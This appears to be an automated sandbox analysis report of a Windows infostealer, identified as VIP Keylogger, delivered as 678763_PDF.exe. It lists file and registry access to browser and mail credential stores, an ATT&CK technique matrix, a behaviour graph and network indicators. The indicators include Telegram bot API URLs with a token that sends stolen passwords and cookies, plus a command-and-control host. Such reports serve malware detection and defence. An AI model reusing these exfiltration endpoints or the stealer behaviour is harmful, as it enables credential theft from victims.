            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Beskftigelsesmssiges.exe PID: 7852, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Beskftigelsesmssiges.exe PID: 7852, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Beskftigelsesmssiges.exe PID: 7852, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            LSASS Memory116
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection
            1
            Software Packing
            Security Account Manager21
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566735 Sample: 678763_PDF.exe Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 36 reallyfreegeoip.org 2->36 38 api.telegram.org 2->38 40 4 other IPs or domains 2->40 50 Found malware configuration 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 Yara detected VIP Keylogger 2->54 60 5 other signatures 2->60 8 678763_PDF.exe 23 2->8         started        signatures3 56 Tries to detect the country of the analysis system (by using the IP) 36->56 58 Uses the Telegram API (likely for C&C communication) 38->58 process4 file5 22 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->22 dropped 24 C:\Users\user\AppData\...\Hyperimmune.Mus, Unicode 8->24 dropped 62 Suspicious powershell command line found 8->62 12 powershell.exe 30 8->12         started        signatures6 process7 file8 26 C:\Users\user\...\Beskftigelsesmssiges.exe, PE32 12->26 dropped 28 Beskftigelsesmssiges.exe:Zone.Identifier, ASCII 12->28 dropped 64 Early bird code injection technique detected 12->64 66 Writes to foreign memory regions 12->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 12->68 70 3 other signatures 12->70 16 Beskftigelsesmssiges.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 30 checkip.dyndns.com 132.226.8.169, 49745, 49778, 49785 UTMEMUS United States 16->30 32 api.telegram.org 149.154.167.220, 443, 49839, 49855 TELEGRAMRU United Kingdom 16->32 34 3 other IPs or domains 16->34 42 Multi AV Scanner detection for dropped file 16->42 44 Tries to steal Mail credentials (via file / registry access) 16->44 46 Tries to harvest and steal browser information (history, passwords, etc) 16->46 48 Switches to a custom stack to bypass stack traces 16->48 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            678763_PDF.exe16%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe16%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.19.174
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.129
              truefalse
                high
                reallyfreegeoip.org
                172.67.177.134
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.8.169
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2003/12/2024%20/%2017:47:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                              high
                              http://checkip.dyndns.org/false
                                high
                                https://reallyfreegeoip.org/xml/8.46.123.228false
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabBeskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.orgBeskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botBeskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.office.com/lBBeskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.org/xml/8.46.123.228$Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C47000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF6000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E4C000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CA8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021D1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20aBeskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://chrome.google.com/webstore?hl=enBeskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D91000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://varders.kozow.com:8081Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.comBeskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2144153415.0000000004881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.google.com/Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004BDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallBeskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E27000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E54000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021C83000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F2A000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBeskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contoso.com/powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
